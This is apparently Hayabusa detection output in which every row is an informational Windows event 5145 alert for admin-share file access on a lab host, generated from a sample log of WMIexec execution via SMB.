10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 